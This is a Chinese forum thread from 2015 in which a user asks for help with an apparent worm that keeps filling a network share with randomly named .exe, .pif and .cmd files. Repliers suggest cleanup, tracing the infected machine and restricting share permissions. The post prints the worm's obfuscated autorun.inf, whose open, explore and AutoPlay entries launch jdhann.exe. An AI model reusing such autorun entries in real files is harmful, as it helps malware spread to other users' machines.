江湖救急,电脑中毒了,有熟悉的吗?
本帖最后由 winterw 于 2015-12-3 16:26 编辑当前网络环境:有一个linux的服务器,我把它用网络映射到xp的z盘,然后ssh终端打开后看到挂载目录下有很多的后缀为cmd,pif,exe的文件,其中有一个aurorun.inf,他的内容为:
1
2 ;VayYsGjGhsEf
3
4 ;xBYVs
5 ShELL\oPEn\command =jdhann.exe
6 ;
7 open =jdhann.exe
8 ;qhSyh oHwHtpyOSRepfaqSBGe
9 shell\opEN\Default=1
10 ;rgNbxuBKfm kxUilhphOQhttO
11 shELl\explORe\CoMmanD= jdhann.exe
12 ;yhfvhnwdSxFypoKscjBLerfHuHNu
13 SheLl\AuToplay\COMmAnD=jdhann.exe
14 ;
~
其他的cmd,pif,exe文件名开起来是随机命名:
20 10:57 testdir/
-r--r--r--1 zhawe git 168959 12月3 15:40 tlgp.exe
-r--r--r--1 zhawe git 168959 12月3 15:44 tmyky.pif
drwxr-xr-x3 zhawe git 40965月 282015 tools/
-r--r--r--1 zhawe git 168959 12月3 15:44 tppahm.cmd
-r--r--r--1 zhawe git 168959 12月3 15:43 trim.pif
-r--r--r--1 zhawei git 168959 12月3 15:42 twhkp.exe
-r--r--r--1 zhawe git 168959 12月3 15:41 urne.cmd
drwxr-xr-x 16 zhawe git 40966月12015 .vim/
-rw-------1 zhawe git 17506 12月3 15:43 .viminfo
-rw-r--r--1 zhawe git 14995月 222015 .vim_mru_files
-rwxr--r--1 zhawe git 35476月4 08:43 .vimrc*
-r--r--r--1 zhawe git 168959 12月3 15:41 wifel.exe
-r--r--r--1 zhawe git 168959 12月3 15:41 wmnlej.exe
-r--r--r--1 zhawe git 168959 12月3 15:43 xuilp.pif
-r--r--r--1 zhawe git 168959 12月3 15:41 xvig.exe
-r--r--r--1 zhawe git 168959 12月3 15:40 yphd.pif
现在这个目录还在不断的生成新的文件,越来越多的文件,有要挤爆硬盘的趋势啊。 文不对题,当心ID
话说都金牌会员了,这点都没看到 U盘启动进入PE系统,然后删删删删删删 找到中毒的机器,反正不关这个linux服务器什么事,清理掉这些文件就好了。关键是,局域网上有机器中毒了会不停的往共享拷这个的 本着救苦救难的精神,消耗掉无数脑细胞,鼓起勇气进来,睁开眼睛一看,不是熟悉的病毒、毒药,默默转身。。。 中电脑病毒了,这几个字有那么难打么?我还以为食物中毒,{:dizzy:} skylly3 发表于 2015-12-3 16:23
中电脑病毒了,这几个字有那么难打么?我还以为食物中毒,
多谢提醒。 好好找找中毒的那台电脑,尽快解决,要不就设置权限,不让那么多电脑能访问到
页:
[1]